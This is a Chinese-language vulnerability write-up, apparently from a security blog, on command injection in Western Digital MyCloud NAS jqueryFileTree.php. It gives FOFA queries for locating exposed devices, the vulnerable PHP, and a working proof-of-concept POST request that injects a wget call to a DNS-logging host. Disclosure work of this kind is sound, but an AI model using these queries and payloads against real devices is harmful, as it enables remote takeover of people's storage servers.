西部数码 NAS jqueryFileTree.php 命令执行漏洞


漏洞简介

Western Digital MyCloud NAS是一款网络附加存储设备,旨在提供集中存储和共享解决方案。它允许用户在家中或办公室通过网络访问文件,支持多种设备的备份和共享。Western Digital MyCloud NAS jqueryFileTree.php中存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

影响版本

<=2.11.153(老版本,已发布修复补丁)

fofa语法

icon_hash="-1074357885" && header="X-Powered-By: PHP/5.4.16"

body="_PROJECT_MODEL_ID_YOSEMITE " && body="_PROJECT_MODEL_ID_LIGHTNING "

漏洞分析

直接看 jqueryFileTree.php 其业务实现逻辑如下

<?php
//
// jQuery File Tree PHP Connector
//
// Version 1.01
//
// Cory S.N. LaViska
// A Beautiful Site (http://abeautifulsite.net/)
// 24 March 2008
//
// History:
//
// 1.01 - updated to work with foreign characters in directory/file names (12 April 2008)
// 1.00 - released (24 March 2008)
//
// Output a list of files for jQuery File Tree
//
//$dir = $_POST['dir'];
//$host = $_POST['host'];
//$pwd = $_POST['pwd'];
//$user = $_POST['user'];

$host = ($_POST['host'] == "")? $_GET['host']:$_POST['host'];
$pwd = ($_POST['pwd'] == "")? $_GET['pwd']:$_POST['pwd'];
$user = ($_POST['user'] == "")? $_GET['user']:$_POST['user'];
$dir = ($_POST['dir'] == "")? $_GET['dir']:$_POST['dir'];
$lang = ($_POST['lang'] == "")? $_GET['lang']:$_POST['lang'];
//echo $dir."dir1=".dir1;
error_reporting(0);

       @unlink("/tmp/ftp-folder.txt");
       @unlink("/tmp/ftp-file.txt");

       $cmd = sprintf("ftp_download -c gettree -i \"%s\" -u \"%s\" -p \"%s\" -t \"%s\" -l \"%s\"", $host, $user, $pwd ,$dir ,$lang);

       $handle = popen($cmd, 'r');    

多个参数如host、pwd、user、dir、lang均未过滤或校验,被直接使用sprintf格式化拼接后使用popen进行执行命令,造成命令注入漏洞。

漏洞复现

POST /web/addons/jqueryFileTree.php HTTP/1.1
Host: west.nas.mrxn.net
Content-Type: application/x-www-form-urlencoded

host=";wget dnslog.pt;"

在DNSLOG平台成功收到DNS和HTTP请求


手机扫码阅读

用友NC oncelogin/getAuth SQL注入漏洞

金和OA CallSystemShow.aspx SQL注入漏洞

评 论